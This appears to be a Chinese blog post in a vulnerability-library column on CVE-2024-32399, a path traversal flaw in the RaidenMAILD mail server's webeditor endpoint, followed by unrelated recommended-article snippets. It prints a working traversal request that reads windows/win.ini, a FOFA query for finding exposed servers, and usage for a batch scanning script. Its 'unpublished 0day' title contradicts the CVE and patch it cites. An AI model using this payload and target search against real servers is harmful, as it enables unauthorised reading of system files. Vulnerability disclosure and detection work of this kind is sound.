【未公开0day】RaidenMAILD CVE-2024-32399 路径穿越漏洞【附poc下载】

已于 2024-10-15 09:36:52 修改
阅读量339 收藏 4
点赞数 1
分类专栏: 漏洞文库 文章标签: 网络安全 安全 web安全
于 2024-10-15 09:32:26 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/AM6C1/article/details/142935295
版权

免责声明:本文仅用于技术学习和讨论。请勿使用本文所提供的内容及相关技术从事非法活动,若利用本文提供的内容或工具造成任何直接或间接的后果及损失,均由使用者本人负责,所产生的一切不良后果均与文章作者及本账号无关。

fofa语法:

body="RaidenMAILD"

一、漏洞简述

RaidenMAILD是一款功能强大的邮件服务器软件,旨在提供高效、安全的邮件发送和接收服务。它支持多种邮件协议,如SMTP、POP3和IMAP,适用于个人用户和企业级应用。RaidenMAILD具有易于配置和管理的特点,并提供丰富的安全功能,如反垃圾邮件和防病毒保护,确保用户通信的安全性和可靠性。此外,它还支持多语言界面,适应不同用户的需求。其接口webeditor存在路径穿越漏洞,攻击者可通过该漏洞获取系统敏感文件信息。

二、漏洞检测poc


GET /webeditor/../../../windows/win.ini HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close

三、漏洞检测脚本

安全测试人员可通过该脚本进行探测自身服务是否存在此漏洞:

POC下载:POC下载

批量检测:

python RaidenMAILD_CVE-2024-32399_Path_Traversal.py -f url.txt

单个url检测漏洞:

python RaidenMAILD_CVE-2024-32399_Path_Traversal.py -u url

四、修复

官方已更新补丁,请升级至最新版本。

RaidenMAILD 路径穿越漏洞CVE-2024-32399
iSee857的博客
09-13 549
RaidenMAILD是一款功能强大的邮件服务器软件,旨在提供高效、安全的邮件发送和接收服务。它支持多种邮件协议,如SMTP、POP3和IMAP,适用于个人用户和企业级应用。RaidenMAILD具有易于配置和管理的特点,并提供丰富的安全功能,如反垃圾邮件和防病毒保护,确保用户通信的安全性和可靠性。此外,它还支持多语言界面,适应不同用户的需求。其接口webeditor存在路径穿越漏洞,攻击者可通过该漏洞获取系统敏感文件信息。厂商已发布补丁 请即时升级。
RaidenMAILD mail server 最新版.rar
07-17
Mail Server 郵件伺服器是目前全世界最通行的訊息傳遞機制而雷電MAILD Mail Server 正是為此打造. 非常歡迎您來到雷電MAILD Mail Server 官方網站, 雷電MAILD Mail Server 是一個適用於全 Windows 平台的電子郵件伺服器. 本公司致力於共享軟體的開發, 所開發之軟體均可自由下載免費使用, 在滿意其功能後, 才決定付費購買, 付費購買的使用者將會收到我們以電子郵件寄送給您的註冊碼來提升至正式版本. 雷電MAILD Mail Server 的出發點是以簡單為其考量, 就算您從來沒裝過郵件伺服器, 只要您本身具備基本的網路知識, 您就能在短短數分鐘內將它架起來. 如果您已經裝過其它的郵件伺服器, 您也會深深感覺到雷電MAILD 真的是眾多 Mail Server 中最簡單安裝的, 更讓人驚奇的是, 它雖然簡單, 功能上的深度卻一點也不含糊, 甚至也已內建 Web Mail 服務, 防火牆功能, 它就是這麼讓人眼睛一亮真叫人不窩心都不行. 尊龍團隊為了國內新世代的優質生活, 從 FTP Server 發展到 MAIL Server, 再從 HTTP Server 發展到 DNS Server, 一連四套伺服器軟體就是要讓國內寬頻玩家能享有獨立自主的架站樂趣. 而在此同時, 也不希望這項樂趣只侷限在少數資深的電腦玩家而已, 我們的宗旨就是只要您有興趣, 架站也可以是輕鬆自在的. ^___^
【复现】用友u8CRM 文件读取漏洞
fushuang333的博客
12-28 888
【复现】用友u8CRM 文件读取漏洞。用友U8CRM 是一款专为代理销售服务行业设计的集CRM、呼叫中心、OA核心应用于一体,提供前端营销、后端业务处理及员工管理一体化应用的管理软件。
漏洞复现】蓝凌EIS 智慧协同平台 rpt_listreport_definefield.aspx SQL注入漏洞
qq_67810151的博客
03-04 639
蓝凌EIS智慧协同平台 rpt_listreport_definefield.aspx 接口存在SQL注入漏洞。未授权的攻击者可以通过该漏洞获取数据库敏感信息。
RaidenMAILD 邮件服务器系统 v3.7.0
11-28
为了增强安全性,系统支持IP地址限制功能,可以设定只允许特定IP或IP段进行连接,防止未授权的访问,有效保护邮件服务器免受恶意攻击。 5. **标题过滤器**: 这一特性允许管理员设置规则,根据邮件标题中的关键词...
[电子邮件服务器软件].Raiden.RaidenMAILD.XP.Edition.v1.9.16.9-Lz0.zip
04-11
SMTP用于将邮件从本地客户端传递到目标邮件服务器,而POP3则用于从邮件服务器下载新邮件至本地客户端。 2. **安全通信**:考虑到网络安全的重要性,RaidenMAILD可能支持SSL/TLS加密,确保邮件在传输过程中不被窃取...
RaidenMAILD v1.9.16
11-02
一个标准的SMTP/POP3邮件伺服器软件,就算你从来没装过邮件服务器,也能在相当短的时间内将它架设起来,而且还有Web远端控制台、WebMail界面、IP限制、标题过滤器、邮件信箱容量限制等方便好用的功能,是架设邮件...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8672
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
2025年港口危货储存单位主要安全管理人员备考练习题
2301_79298466的博客
04-09 259
4、安全生产事故响应分级主要针对事故危害程度、影响范围和单位控制事态的能力,将事故分为不同的等级。2、运输民用爆炸物品车辆未按照规定悬挂或者安装符合国家标准的易燃易爆危险物品警示标志的,由公安机关责令改正,处( )的罚款2。3、港口危险货物储存作业单位主要安全管理人员安全生产知识和管理能力考核总分 100 分,合格分数为( )。1、依据《安全生产法》,危险物品的生产、储存单位的安全生产管理人员的任免,应当告知( )。A. 主管的负有安全生产监督管理职责的部门。D. 5 万元以上 20 万元以下。
视频智能分析平台EasyCVR打造智能视频监控烟火预警系统,助力烟花鞭炮厂坚固安全防线
NVR安防视频技术
04-11 408
为有效预防和减少事故的发生,应急管理部要求,全国烟花爆竹生产企业需在规定时间内,完成报警与监控联网,排查安全隐患,保障国家和人民财产的安全
餐饮厨房开源监控安全系统的智能革命
Q12345bb的博客
04-10 443
如何让后厨更透明、更安全、更可信?- 行为识别:基于深度学习(ResNet+姿态分析),捕捉吸烟、离岗、未按流程操作等违规行为,误报率低于2%。- 内置反馈通道,用户可通过APP提交建议(如“后厨油烟过重”),AI分类后推送至管理者。,打造智能化、全方位的安全防护网,助力餐饮行业破解管理痛点,提升消费者信心,开启智慧后厨新篇章!- 检测食品安全风险,如生熟分离不规范、添加剂滥用,识别率达97%,响应时间低于1秒。- 效果:某连锁餐厅试点,日均发现10余次卫生隐患,整改率提升90%。
包含网络、平台、数据及安全四大体系的智慧快消开源了
weixin_63598920的博客
04-10 476
智慧快消视频监控平台是一款功能强大且简单易用的实时算法视频监控系统。它的愿景是最底层打通各大芯片厂商相互间的壁垒,省去繁琐重复的适配流程,实现芯片、算法、应用的全流程组合,从而大大减少企业级应用约95%的开发成本。国产化人工智能“产学 研用”一体化创新模式 在行业的建立,将大大提升当地政府人工智能形象。用户只需在界面上进行简单的操作,就可以实现全视频的接入及布控。
WHAT - React 安全地订阅外部状态源 - useSyncExternalStore
weixin_58540586的博客
04-09 759
方案是否支持并发模式会不会 stale / tearing❌ 不可靠⚠️ 有风险✅ 支持✅ 不会撕裂如果你在写一个“订阅型”的 hook,比如监听媒体查询WebSocketReduxZustandwindow 变化等——就推荐用。用途用法本地 React 状态管理useStateuseReducer全局状态库(Redux 等)推荐使用原生订阅类对象(如 window、WebSocket)兼容 SSR支持如果你用的是 Redux 4.2+,它的就内部用的。
从“被动跳闸”到“主动预警”:智慧用电系统守护老旧小区安全
最新发布
Acrelgq23的博客
04-13 234
据统计,我国居住场所火灾伤亡人数远超其他场所,仅今年一季度就发生8.3万起住宅火灾,造成503人遇难。这些建筑多建于上世纪,缺乏基础消防设施,而居民用电需求激增与线路老化、私拉乱接等问题叠加,进一步加剧了火灾风险。系统实时采集电压、电流、温度等数据,精准识别漏电、过载、短路等异常,并定位故障点。例如,用电高峰时可自动调节公共照明亮度,优先保障居民用电,避免过载跳闸。例如,通过电流波动发现绝缘层破损,提前预警检修,防患于未然。实时监测灭火器、消防泵等设备状态,提醒维护周期,确保火灾时设备可用。
安全厂商安全理念分析
heardlover的博客
04-09 614
简单有效,省心可靠”
组件安全工程化革命:从防御体系构建到安全基因重塑
ELIHU_han的博客
04-13 670
安全团队溯源发现,攻击者通过伪造的优惠券组件注入恶意脚本,在1.2秒内窃取了8.7万条用户支付信息。这场价值3.2亿元的攻防战,将组件安全推向了技术革命的风口浪尖。在特斯拉某车载系统的组件评审会上,工程师们正在争论是否要为导航组件增加量子加密层。这标志着组件安全进入新的纪元——安全正在从"成本中心"转变为"核心竞争力"。"当每个组件都具备安全感知能力时,前端应用将成为自我防御的有机体。:Element Plus表格组件的深度安全加固。一、组件生态的"七宗罪"与安全基因重组。:基于强化学习的自适应防御体系。
传统安全厂商如何介入云安全
heardlover的博客
04-09 663
传统安全厂商通过 “技术云原生化、生态联盟化、服务订阅化” 三大路径,在零信任、SASE、云原生安全等领域实现快速追赶。的三维策略,通过并购、合作、标准化参与等方式快速追赶,同时在云原生安全、订阅制服务等领域实现突破。,推动身份认证、动态授权等技术的规范化,2024 年该标准已在金融、医疗等行业落地,带动零信任解决方案采购量增长 60%。,实现威胁预测与自动化响应。,将防火墙、IPS 等功能云化,支持按分支机构或终端灵活订阅,2024 年该服务在制造业客户中渗透率超 30%。
使用Azure policy 来保证Azure 的安全和强制合规
介绍AWS Azure GCP devops Terraform 等技术
04-09 291
在Azure 中部署资源时,一个需要实施的关键方面是护栏。这是在组织级别部署资源时的关键安全要求之一。我将展示如何通过 Azure Policy 实现护栏,以及如何通过 Terraform 实现。
C++Cherno 学习笔记day18 [71]-[75] C++安全、PCH、dynamic_cast、基准测试、结构化绑定
Shirleyyy1的博客
04-10 634
通过结构化绑定,C++代码可以更直观地处理复合数据,减少冗余变量声明,同时保持类型安全和性能。用于生产环境使用智能指针,用于学习和了解工作积累,使用原始指针,当然,如果你需要定制的话,也可以使用自己写的智能指针。预编译的头文件实际上是让你抓取一堆头文件,并将它们转换成编译器可以使用的格式,而不必一遍又一遍地读取这些头文件。GR-,/GR-的意思是我们关掉了RTTI,给我们带来不可预测的行为。安全编程,或者说C++编程中,降低崩溃,内存泄露、非法访问等问题。,它不像编译时进行的类型转换,而是。
最新版RaidenMAILD邮件服务器软件功能介绍
2. **免费下载**:软件可以免费下载并使用,供用户测试其功能,从而根据个人满意度决定是否进行付费购买。 3. **功能丰富**:尽管安装简单,RaidenMAILD Mail Server提供的功能强大且实用,能够满足大多数用户的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值